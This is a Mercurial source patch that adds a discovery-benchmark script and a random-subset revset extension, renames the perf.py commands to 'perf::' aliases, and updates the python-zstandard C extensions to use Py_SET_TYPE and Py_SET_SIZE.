+ Manufacturer='Olivia Mackall and others'>
<Package Id='*'
Keywords='Installer'
Description="Mercurial distributed SCM (version $(var.Version))"
Comments='$(var.Comments)'
Platform='$(var.Platform)'
- Manufacturer='Matt Mackall and others'
+ Manufacturer='Olivia Mackall and others'
InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' />
<Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1'
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/perf-utils/search-discovery-case Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,198 @@
+#!/usr/bin/env python3
+# Search for interesting discovery instance
+#
+# search-discovery-case REPO [REPO]…
+#
+# This use a subsetmaker extension (next to this script) to generate a steam of
+# random discovery instance. When interesting case are discovered, information
+# about them are print on the stdout.
+from __future__ import print_function
+
+import json
+import os
+import queue
+import random
+import signal
+import subprocess
+import sys
+import threading
+
+this_script = os.path.abspath(sys.argv[0])
+this_dir = os.path.dirname(this_script)
+hg_dir = os.path.join(this_dir, '..', '..')
+HG_REPO = os.path.normpath(hg_dir)
+HG_BIN = os.path.join(HG_REPO, 'hg')
+
+JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8))
+
+
+SLICING = ('scratch', 'randomantichain', 'rev')
+
+
+def nb_revs(repo_path):
+ cmd = [
+ HG_BIN,
+ '--repository',
+ repo_path,
+ 'log',
+ '--template',
+ '{rev}',
+ '--rev',
+ 'tip',
+ ]
+ s = subprocess.Popen(cmd, stdout=subprocess.PIPE)
+ out, err = s.communicate()
+ return int(out)
+
+
+repos = []
+for repo in sys.argv[1:]:
+ size = nb_revs(repo)
+ repos.append((repo, size))
+
+
+def pick_one(repo):
+ pick = random.choice(SLICING)
+ seed = random.randint(0, 100000)
+ if pick == 'scratch':
+ start = int(repo[1] * 0.3)
+ end = int(repo[1] * 0.7)
+ nb = random.randint(start, end)
+ return ('scratch', nb, seed)
+ elif pick == 'randomantichain':
+ return ('randomantichain', seed)
+ elif pick == 'rev':
+ start = int(repo[1] * 0.3)
+ end = int(repo[1])
+ rev = random.randint(start, end)
+ return ('rev', rev)
+ else:
+ assert False
+
+
+done = threading.Event()
+cases = queue.Queue(maxsize=10 * JOB)
+results = queue.Queue()
+
+
+def worker():
+ while not done.is_set():
+ c = cases.get()
+ if c is None:
+ return
+ try:
+ res = process(c)
+ results.put((c, res))
+ except Exception as exc:
+ print('processing-failed: %s %s' % (c, exc), file=sys.stderr)
+ c = (c[0], c[2], c[1])
+ try:
+ res = process(c)
+ results.put((c, res))
+ except Exception as exc:
+ print('processing-failed: %s %s' % (c, exc), file=sys.stderr)
+
+
+SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py')
+
+
+CMD_BASE = (
+ HG_BIN,
+ 'debugdiscovery',
+ '--template',
+ 'json',
+ '--config',
+ 'extensions.subset=%s' % SUBSET_PATH,
+)
+# '--local-as-revs "$left" --local-as-revs "$right"'
+# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt
+# )
+
+
+def to_revsets(case):
+ t = case[0]
+ if t == 'scratch':
+ return 'not scratch(all(), %d, "%d")' % (case[1], case[2])
+ elif t == 'randomantichain':
+ return '::randomantichain(all(), "%d")' % case[1]
+ elif t == 'rev':
+ return '::%d' % case[1]
+ else:
+ assert False
+
+
+def process(case):
+ (repo, left, right) = case
+ cmd = list(CMD_BASE)
+ cmd.append('-R')
+ cmd.append(repo[0])
+ cmd.append('--local-as-revs')
+ cmd.append(to_revsets(left))
+ cmd.append('--remote-as-revs')
+ cmd.append(to_revsets(right))
+ s = subprocess.Popen(cmd, stdout=subprocess.PIPE)
+ out, err = s.communicate()
+ return json.loads(out)[0]
+
+
+def interesting_boundary(res):
+ """check if a case is interesting or not
+
+ For now we are mostly interrested in case were we do multiple roundstrip
+ and where the boundary is somewhere in the middle of the undecided set.
+
+ Ideally, we would make this configurable, but this is not a focus for now
+
+ return None or (round-trip, undecided-common, undecided-missing)
+ """
+ roundtrips = res["total-roundtrips"]
+ if roundtrips <= 1:
+ return None
+ undecided_common = res["nb-ini_und-common"]
+ undecided_missing = res["nb-ini_und-missing"]
+ if undecided_common == 0:
+ return None
+ if undecided_missing == 0:
+ return None
+ return (roundtrips, undecided_common, undecided_missing)
+
+
+def end(*args, **kwargs):
+ done.set()
+
+
+def format_case(case):
+ return '-'.join(str(s) for s in case)
+
+
+signal.signal(signal.SIGINT, end)
+
+for i in range(JOB):
+ threading.Thread(target=worker).start()
+
+nb_cases = 0
+while not done.is_set():
+ repo = random.choice(repos)
+ left = pick_one(repo)
+ right = pick_one(repo)
+ cases.put((repo, left, right))
+ while not results.empty():
+ # results has a single reader so this is fine
+ c, res = results.get_nowait()
+ boundary = interesting_boundary(res)
+ if boundary is not None:
+ print(c[0][0], format_case(c[1]), format_case(c[2]), *boundary)
+ sys.stdout.flush()
+
+ nb_cases += 1
+ if not nb_cases % 100:
+ print('[%d cases generated]' % nb_cases, file=sys.stderr)
+
+for i in range(JOB):
+ try:
+ cases.put_nowait(None)
+ except queue.Full:
+ pass
+
+print('[%d cases generated]' % nb_cases, file=sys.stderr)
+print('[ouput generation is over]' % nb_cases, file=sys.stderr)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/perf-utils/subsetmaker.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,170 @@
+"""revset to select sample of repository
+
+Hopefully this is useful to create interesting discovery cases.
+"""
+
+import collections
+import random
+
+from mercurial.i18n import _
+
+from mercurial import (
+ registrar,
+ revset,
+ revsetlang,
+ smartset,
+)
+
+revsetpredicate = registrar.revsetpredicate()
+
+
+@revsetpredicate(b'subsetspec("<spec>")')
+def subsetmarkerspec(repo, subset, x):
+ """use a shorthand spec as used by search-discovery-case
+
+ Supported format are:
+
+ - "scratch-count-seed": not scratch(all(), count, "seed")
+ - "randomantichain-seed": ::randomantichain(all(), "seed")
+ - "rev-REV": "::REV"
+ """
+ args = revsetlang.getargs(
+ x, 0, 1, _(b'subsetspec("spec") required an argument')
+ )
+
+ spec = revsetlang.getstring(args[0], _(b"spec should be a string"))
+ case = spec.split(b'-')
+ t = case[0]
+ if t == b'scratch':
+ spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2])
+ elif t == b'randomantichain':
+ spec_revset = b'::randomantichain(all(), "%s")' % case[1]
+ elif t == b'rev':
+ spec_revset = b'::%d' % case[1]
+ else:
+ assert False, spec
+
+ selected = repo.revs(spec_revset)
+
+ return selected & subset
+
+
+@revsetpredicate(b'scratch(REVS, <count>, [seed])')
+def scratch(repo, subset, x):
+ """randomly remove <count> revision from the repository top
+
+ This subset is created by recursively picking changeset starting from the
+ heads. It can be summarized using the following algorithm::
+
+ selected = set()
+ for i in range(<count>):
+ unselected = repo.revs("not <selected>")
+ candidates = repo.revs("heads(<unselected>)")
+ pick = random.choice(candidates)
+ selected.add(pick)
+ """
+ m = _(b"scratch expects revisions, count argument and an optional seed")
+ args = revsetlang.getargs(x, 2, 3, m)
+ if len(args) == 2:
+ x, n = args
+ rand = random
+ elif len(args) == 3:
+ x, n, seed = args
+ seed = revsetlang.getinteger(seed, _(b"seed should be a number"))
+ rand = random.Random(seed)
+ else:
+ assert False
+
+ n = revsetlang.getinteger(n, _(b"scratch expects a number"))
+
+ selected = set()
+ heads = set()
+ children_count = collections.defaultdict(lambda: 0)
+ parents = repo.changelog._uncheckedparentrevs
+
+ baseset = revset.getset(repo, smartset.fullreposet(repo), x)
+ baseset.sort()
+ for r in baseset:
+ heads.add(r)
+
+ p1, p2 = parents(r)
+ if p1 >= 0:
+ heads.discard(p1)
+ children_count[p1] += 1
+ if p2 >= 0:
+ heads.discard(p2)
+ children_count[p2] += 1
+
+ for h in heads:
+ assert children_count[h] == 0
+
+ selected = set()
+ for x in range(n):
+ if not heads:
+ break
+ pick = rand.choice(list(heads))
+ heads.remove(pick)
+ assert pick not in selected
+ selected.add(pick)
+ p1, p2 = parents(pick)
+ if p1 in children_count:
+ assert p1 in children_count
+ children_count[p1] -= 1
+ assert children_count[p1] >= 0
+ if children_count[p1] == 0:
+ assert p1 not in selected, (r, p1)
+ heads.add(p1)
+ if p2 in children_count:
+ assert p2 in children_count
+ children_count[p2] -= 1
+ assert children_count[p2] >= 0
+ if children_count[p2] == 0:
+ assert p2 not in selected, (r, p2)
+ heads.add(p2)
+
+ return smartset.baseset(selected) & subset
+
+
+@revsetpredicate(b'randomantichain(REVS, [seed])')
+def antichain(repo, subset, x):
+ """Pick a random anti-chain in the repository
+
+ A antichain is a set of changeset where there isn't any element that is
+ either a descendant or ancestors of any other element in the set. In other
+ word, all the elements are independant. It can be summarized with the
+ following algorithm::
+
+ selected = set()
+ unselected = repo.revs('all()')
+ while unselected:
+ pick = random.choice(unselected)
+ selected.add(pick)
+ unselected -= repo.revs('::<pick> + <pick>::')
+ """
+
+ args = revsetlang.getargs(
+ x, 1, 2, _(b"randomantichain expects revisions and an optional seed")
+ )
+ if len(args) == 1:
+ (x,) = args
+ rand = random
+ elif len(args) == 2:
+ x, seed = args
+ seed = revsetlang.getinteger(seed, _(b"seed should be a number"))
+ rand = random.Random(seed)
+ else:
+ assert False
+
+ selected = set()
+
+ baseset = revset.getset(repo, smartset.fullreposet(repo), x)
+ undecided = baseset
+
+ while undecided:
+ pick = rand.choice(list(undecided))
+ selected.add(pick)
+ undecided = repo.revs(
+ '%ld and not (::%ld or %ld::head())', baseset, selected, selected
+ )
+
+ return smartset.baseset(selected) & subset
--- a/contrib/perf.py Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/perf.py Tue Apr 20 11:01:06 2021 -0400
@@ -744,7 +744,7 @@
# perf commands
-@command(b'perfwalk', formatteropts)
+@command(b'perf::walk|perfwalk', formatteropts)
def perfwalk(ui, repo, *pats, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -759,7 +759,7 @@
fm.end()
-@command(b'perfannotate', formatteropts)
+@command(b'perf::annotate|perfannotate', formatteropts)
def perfannotate(ui, repo, f, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -769,7 +769,7 @@
@command(
- b'perfstatus',
+ b'perf::status|perfstatus',
[
(b'u', b'unknown', False, b'ask status to look for unknown files'),
(b'', b'dirstate', False, b'benchmark the internal dirstate call'),
@@ -806,7 +806,7 @@
fm.end()
-@command(b'perfaddremove', formatteropts)
+@command(b'perf::addremove|perfaddremove', formatteropts)
def perfaddremove(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -837,7 +837,7 @@
cl._nodepos = None
-@command(b'perfheads', formatteropts)
+@command(b'perf::heads|perfheads', formatteropts)
def perfheads(ui, repo, **opts):
"""benchmark the computation of a changelog heads"""
opts = _byteskwargs(opts)
@@ -855,7 +855,7 @@
@command(
- b'perftags',
+ b'perf::tags|perftags',
formatteropts
+ [
(b'', b'clear-revlogs', False, b'refresh changelog and manifest'),
@@ -880,7 +880,7 @@
fm.end()
-@command(b'perfancestors', formatteropts)
+@command(b'perf::ancestors|perfancestors', formatteropts)
def perfancestors(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -894,7 +894,7 @@
fm.end()
-@command(b'perfancestorset', formatteropts)
+@command(b'perf::ancestorset|perfancestorset', formatteropts)
def perfancestorset(ui, repo, revset, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -910,12 +910,18 @@
fm.end()
-@command(b'perfdiscovery', formatteropts, b'PATH')
+@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH')
def perfdiscovery(ui, repo, path, **opts):
"""benchmark discovery between local repo and the peer at given path"""
repos = [repo, None]
timer, fm = gettimer(ui, opts)
- path = ui.expandpath(path)
+
+ try:
+ from mercurial.utils.urlutil import get_unique_pull_path
+
+ path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0]
+ except ImportError:
+ path = ui.expandpath(path)
def s():
repos[1] = hg.peer(ui, opts, path)
@@ -928,7 +934,7 @@
@command(
- b'perfbookmarks',
+ b'perf::bookmarks|perfbookmarks',
formatteropts
+ [
(b'', b'clear-revlogs', False, b'refresh changelog and manifest'),
@@ -953,7 +959,7 @@
fm.end()
-@command(b'perfbundleread', formatteropts, b'BUNDLE')
+@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE')
def perfbundleread(ui, repo, bundlepath, **opts):
"""Benchmark reading of bundle files.
@@ -1080,7 +1086,7 @@
@command(
- b'perfchangegroupchangelog',
+ b'perf::changegroupchangelog|perfchangegroupchangelog',
formatteropts
+ [
(b'', b'cgversion', b'02', b'changegroup version'),
@@ -1116,7 +1122,7 @@
fm.end()
-@command(b'perfdirs', formatteropts)
+@command(b'perf::dirs|perfdirs', formatteropts)
def perfdirs(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1132,7 +1138,7 @@
@command(
- b'perfdirstate',
+ b'perf::dirstate|perfdirstate',
[
(
b'',
@@ -1195,7 +1201,7 @@
fm.end()
-@command(b'perfdirstatedirs', formatteropts)
+@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts)
def perfdirstatedirs(ui, repo, **opts):
"""benchmap a 'dirstate.hasdir' call from an empty `dirs` cache"""
opts = _byteskwargs(opts)
@@ -1212,7 +1218,7 @@
fm.end()
-@command(b'perfdirstatefoldmap', formatteropts)
+@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts)
def perfdirstatefoldmap(ui, repo, **opts):
"""benchmap a `dirstate._map.filefoldmap.get()` request
@@ -1233,7 +1239,7 @@
fm.end()
-@command(b'perfdirfoldmap', formatteropts)
+@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts)
def perfdirfoldmap(ui, repo, **opts):
"""benchmap a `dirstate._map.dirfoldmap.get()` request
@@ -1255,7 +1261,7 @@
fm.end()
-@command(b'perfdirstatewrite', formatteropts)
+@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts)
def perfdirstatewrite(ui, repo, **opts):
"""benchmap the time it take to write a dirstate on disk"""
opts = _byteskwargs(opts)
@@ -1297,7 +1303,7 @@
@command(
- b'perfmergecalculate',
+ b'perf::mergecalculate|perfmergecalculate',
[
(b'r', b'rev', b'.', b'rev to merge against'),
(b'', b'from', b'', b'rev to merge from'),
@@ -1330,7 +1336,7 @@
@command(
- b'perfmergecopies',
+ b'perf::mergecopies|perfmergecopies',
[
(b'r', b'rev', b'.', b'rev to merge against'),
(b'', b'from', b'', b'rev to merge from'),
@@ -1353,7 +1359,7 @@
fm.end()
-@command(b'perfpathcopies', [], b"REV REV")
+@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV")
def perfpathcopies(ui, repo, rev1, rev2, **opts):
"""benchmark the copy tracing logic"""
opts = _byteskwargs(opts)
@@ -1369,7 +1375,7 @@
@command(
- b'perfphases',
+ b'perf::phases|perfphases',
[
(b'', b'full', False, b'include file reading time too'),
],
@@ -1394,7 +1400,7 @@
fm.end()
-@command(b'perfphasesremote', [], b"[DEST]")
+@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]")
def perfphasesremote(ui, repo, dest=None, **opts):
"""benchmark time needed to analyse phases of the remote server"""
from mercurial.node import bin
@@ -1407,7 +1413,7 @@
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
+ path = ui.getpath(dest, default=(b'default-push', b'default'))
if not path:
raise error.Abort(
b'default repository not configured!',
@@ -1455,7 +1461,7 @@
@command(
- b'perfmanifest',
+ b'perf::manifest|perfmanifest',
[
(b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
(b'', b'clear-disk', False, b'clear on-disk caches too'),
@@ -1499,7 +1505,7 @@
fm.end()
-@command(b'perfchangeset', formatteropts)
+@command(b'perf::changeset|perfchangeset', formatteropts)
def perfchangeset(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1513,7 +1519,7 @@
fm.end()
-@command(b'perfignore', formatteropts)
+@command(b'perf::ignore|perfignore', formatteropts)
def perfignore(ui, repo, **opts):
"""benchmark operation related to computing ignore"""
opts = _byteskwargs(opts)
@@ -1532,7 +1538,7 @@
@command(
- b'perfindex',
+ b'perf::index|perfindex',
[
(b'', b'rev', [], b'revision to be looked up (default tip)'),
(b'', b'no-lookup', None, b'do not revision lookup post creation'),
@@ -1596,7 +1602,7 @@
@command(
- b'perfnodemap',
+ b'perf::nodemap|perfnodemap',
[
(b'', b'rev', [], b'revision to be looked up (default tip)'),
(b'', b'clear-caches', True, b'clear revlog cache between calls'),
@@ -1667,7 +1673,7 @@
fm.end()
-@command(b'perfstartup', formatteropts)
+@command(b'perf::startup|perfstartup', formatteropts)
def perfstartup(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1685,7 +1691,7 @@
fm.end()
-@command(b'perfparents', formatteropts)
+@command(b'perf::parents|perfparents', formatteropts)
def perfparents(ui, repo, **opts):
"""benchmark the time necessary to fetch one changeset's parents.
@@ -1712,7 +1718,7 @@
fm.end()
-@command(b'perfctxfiles', formatteropts)
+@command(b'perf::ctxfiles|perfctxfiles', formatteropts)
def perfctxfiles(ui, repo, x, **opts):
opts = _byteskwargs(opts)
x = int(x)
@@ -1725,7 +1731,7 @@
fm.end()
-@command(b'perfrawfiles', formatteropts)
+@command(b'perf::rawfiles|perfrawfiles', formatteropts)
def perfrawfiles(ui, repo, x, **opts):
opts = _byteskwargs(opts)
x = int(x)
@@ -1739,7 +1745,7 @@
fm.end()
-@command(b'perflookup', formatteropts)
+@command(b'perf::lookup|perflookup', formatteropts)
def perflookup(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1748,7 +1754,7 @@
@command(
- b'perflinelogedits',
+ b'perf::linelogedits|perflinelogedits',
[
(b'n', b'edits', 10000, b'number of edits'),
(b'', b'max-hunk-lines', 10, b'max lines in a hunk'),
@@ -1786,7 +1792,7 @@
fm.end()
-@command(b'perfrevrange', formatteropts)
+@command(b'perf::revrange|perfrevrange', formatteropts)
def perfrevrange(ui, repo, *specs, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1795,7 +1801,7 @@
fm.end()
-@command(b'perfnodelookup', formatteropts)
+@command(b'perf::nodelookup|perfnodelookup', formatteropts)
def perfnodelookup(ui, repo, rev, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -1814,7 +1820,7 @@
@command(
- b'perflog',
+ b'perf::log|perflog',
[(b'', b'rename', False, b'ask log to follow renames')] + formatteropts,
)
def perflog(ui, repo, rev=None, **opts):
@@ -1832,7 +1838,7 @@
fm.end()
-@command(b'perfmoonwalk', formatteropts)
+@command(b'perf::moonwalk|perfmoonwalk', formatteropts)
def perfmoonwalk(ui, repo, **opts):
"""benchmark walking the changelog backwards
@@ -1851,7 +1857,7 @@
@command(
- b'perftemplating',
+ b'perf::templating|perftemplating',
[
(b'r', b'rev', [], b'revisions to run the template on'),
]
@@ -1941,7 +1947,7 @@
@command(
- b'perfhelper-mergecopies',
+ b'perf::helper-mergecopies|perfhelper-mergecopies',
formatteropts
+ [
(b'r', b'revs', [], b'restrict search to these revisions'),
@@ -2124,7 +2130,7 @@
@command(
- b'perfhelper-pathcopies',
+ b'perf::helper-pathcopies|perfhelper-pathcopies',
formatteropts
+ [
(b'r', b'revs', [], b'restrict search to these revisions'),
@@ -2263,7 +2269,7 @@
_displaystats(ui, opts, entries, alldata)
-@command(b'perfcca', formatteropts)
+@command(b'perf::cca|perfcca', formatteropts)
def perfcca(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2271,7 +2277,7 @@
fm.end()
-@command(b'perffncacheload', formatteropts)
+@command(b'perf::fncacheload|perffncacheload', formatteropts)
def perffncacheload(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2284,7 +2290,7 @@
fm.end()
-@command(b'perffncachewrite', formatteropts)
+@command(b'perf::fncachewrite|perffncachewrite', formatteropts)
def perffncachewrite(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2304,7 +2310,7 @@
fm.end()
-@command(b'perffncacheencode', formatteropts)
+@command(b'perf::fncacheencode|perffncacheencode', formatteropts)
def perffncacheencode(ui, repo, **opts):
opts = _byteskwargs(opts)
timer, fm = gettimer(ui, opts)
@@ -2348,7 +2354,7 @@
@command(
- b'perfbdiff',
+ b'perf::bdiff|perfbdiff',
revlogopts
+ formatteropts
+ [
@@ -2464,7 +2470,7 @@
@command(
- b'perfunidiff',
+ b'perf::unidiff|perfunidiff',
revlogopts
+ formatteropts
+ [
@@ -2543,7 +2549,7 @@
fm.end()
-@command(b'perfdiffwd', formatteropts)
+@command(b'perf::diffwd|perfdiffwd', formatteropts)
def perfdiffwd(ui, repo, **opts):
"""Profile diff of working directory changes"""
opts = _byteskwargs(opts)
@@ -2568,7 +2574,11 @@
fm.end()
-@command(b'perfrevlogindex', revlogopts + formatteropts, b'-c|-m|FILE')
+@command(
+ b'perf::revlogindex|perfrevlogindex',
+ revlogopts + formatteropts,
+ b'-c|-m|FILE',
+)
def perfrevlogindex(ui, repo, file_=None, **opts):
"""Benchmark operations against a revlog index.
@@ -2704,7 +2714,7 @@
@command(
- b'perfrevlogrevisions',
+ b'perf::revlogrevisions|perfrevlogrevisions',
revlogopts
+ formatteropts
+ [
@@ -2754,7 +2764,7 @@
@command(
- b'perfrevlogwrite',
+ b'perf::revlogwrite|perfrevlogwrite',
revlogopts
+ formatteropts
+ [
@@ -3047,7 +3057,7 @@
@command(
- b'perfrevlogchunks',
+ b'perf::revlogchunks|perfrevlogchunks',
revlogopts
+ formatteropts
+ [
@@ -3176,7 +3186,7 @@
@command(
- b'perfrevlogrevision',
+ b'perf::revlogrevision|perfrevlogrevision',
revlogopts
+ formatteropts
+ [(b'', b'cache', False, b'use caches instead of clearing')],
@@ -3218,7 +3228,10 @@
start = r.start
length = r.length
inline = r._inline
- iosize = r._io.size
+ try:
+ iosize = r.index.entry_size
+ except AttributeError:
+ iosize = r._io.size
buffer = util.buffer
chunks = []
@@ -3319,7 +3332,7 @@
@command(
- b'perfrevset',
+ b'perf::revset|perfrevset',
[
(b'C', b'clear', False, b'clear volatile cache between each call.'),
(b'', b'contexts', False, b'obtain changectx for each revision'),
@@ -3352,7 +3365,7 @@
@command(
- b'perfvolatilesets',
+ b'perf::volatilesets|perfvolatilesets',
[
(b'', b'clear-obsstore', False, b'drop obsstore between each call.'),
]
@@ -3401,7 +3414,7 @@
@command(
- b'perfbranchmap',
+ b'perf::branchmap|perfbranchmap',
[
(b'f', b'full', False, b'Includes build time of subset'),
(
@@ -3492,7 +3505,7 @@
@command(
- b'perfbranchmapupdate',
+ b'perf::branchmapupdate|perfbranchmapupdate',
[
(b'', b'base', [], b'subset of revision to start from'),
(b'', b'target', [], b'subset of revision to end with'),
@@ -3602,7 +3615,7 @@
@command(
- b'perfbranchmapload',
+ b'perf::branchmapload|perfbranchmapload',
[
(b'f', b'filter', b'', b'Specify repoview filter'),
(b'', b'list', False, b'List brachmap filter caches'),
@@ -3661,19 +3674,19 @@
fm.end()
-@command(b'perfloadmarkers')
+@command(b'perf::loadmarkers|perfloadmarkers')
def perfloadmarkers(ui, repo):
"""benchmark the time to parse the on-disk markers for a repo
Result is the number of markers in the repo."""
timer, fm = gettimer(ui)
svfs = getsvfs(repo)
- timer(lambda: len(obsolete.obsstore(svfs)))
+ timer(lambda: len(obsolete.obsstore(repo, svfs)))
fm.end()
@command(
- b'perflrucachedict',
+ b'perf::lrucachedict|perflrucachedict',
formatteropts
+ [
(b'', b'costlimit', 0, b'maximum total cost of items in cache'),
@@ -3829,7 +3842,7 @@
@command(
- b'perfwrite',
+ b'perf::write|perfwrite',
formatteropts
+ [
(b'', b'write-method', b'write', b'ui write method'),
@@ -3892,7 +3905,7 @@
@command(
- b'perfprogress',
+ b'perf::progress|perfprogress',
formatteropts
+ [
(b'', b'topic', b'topic', b'topic for progress messages'),
--- a/contrib/python-zstandard/c-ext/bufferutil.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/bufferutil.c Tue Apr 20 11:01:06 2021 -0400
@@ -758,7 +758,7 @@
};
void bufferutil_module_init(PyObject* mod) {
- Py_TYPE(&ZstdBufferWithSegmentsType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type);
if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) {
return;
}
@@ -766,7 +766,7 @@
Py_INCREF(&ZstdBufferWithSegmentsType);
PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType);
- Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type);
if (PyType_Ready(&ZstdBufferSegmentsType) < 0) {
return;
}
@@ -774,7 +774,7 @@
Py_INCREF(&ZstdBufferSegmentsType);
PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType);
- Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type);
if (PyType_Ready(&ZstdBufferSegmentType) < 0) {
return;
}
@@ -782,7 +782,7 @@
Py_INCREF(&ZstdBufferSegmentType);
PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType);
- Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type);
if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionchunker.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionchunker.c Tue Apr 20 11:01:06 2021 -0400
@@ -348,12 +348,12 @@
};
void compressionchunker_module_init(PyObject* module) {
- Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) {
return;
}
- Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionChunkerType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressiondict.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressiondict.c Tue Apr 20 11:01:06 2021 -0400
@@ -400,7 +400,7 @@
};
void compressiondict_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionDictType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionDictType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionparams.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionparams.c Tue Apr 20 11:01:06 2021 -0400
@@ -556,7 +556,7 @@
};
void compressionparams_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionParametersType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionreader.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionreader.c Tue Apr 20 11:01:06 2021 -0400
@@ -811,7 +811,7 @@
void compressionreader_module_init(PyObject* mod) {
/* TODO make reader a sub-class of io.RawIOBase */
- Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionReaderType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressionwriter.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressionwriter.c Tue Apr 20 11:01:06 2021 -0400
@@ -365,7 +365,7 @@
};
void compressionwriter_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionWriterType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressobj.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressobj.c Tue Apr 20 11:01:06 2021 -0400
@@ -249,7 +249,7 @@
};
void compressobj_module_init(PyObject* module) {
- Py_TYPE(&ZstdCompressionObjType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type);
if (PyType_Ready(&ZstdCompressionObjType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressor.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressor.c Tue Apr 20 11:01:06 2021 -0400
@@ -619,7 +619,7 @@
goto finally;
}
- Py_SIZE(output) = outBuffer.pos;
+ Py_SET_SIZE(output, outBuffer.pos);
finally:
PyBuffer_Release(&source);
@@ -1659,7 +1659,7 @@
};
void compressor_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressorType, &PyType_Type);
